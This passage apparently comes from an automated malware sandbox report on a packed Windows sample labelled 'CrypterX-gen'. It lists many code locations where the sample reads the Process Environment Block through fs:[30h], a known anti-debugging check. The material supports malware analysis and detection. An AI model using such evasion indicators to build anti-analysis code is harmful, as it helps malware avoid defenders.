            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD4015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B87016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3701D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B06800 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD1074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2F86D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B07057 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1843 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD9BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8BB6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1BA8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD5BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B34BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04B94 mov edi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2EB9A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BAEB8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3138B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BBD380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B11B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B11B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B303E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BA6BEC mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BB23E3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B01BE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B853CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B353C5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A309 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B07B70 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1F370 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B96365 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B33B5A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B0DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B1AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B312BD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B01AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B162A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B35AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B35AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B052A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC129A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B3DA88 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC4AEF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BCB2E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BD8ADD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B012D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05AC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B32ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B03ACA mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2B236 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B08239 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B04A20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01BC1229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B44A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B2A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.22126.16591.exeCode function: 9_2_01B05210 mov ecx, dword ptr fs:[00000030h]
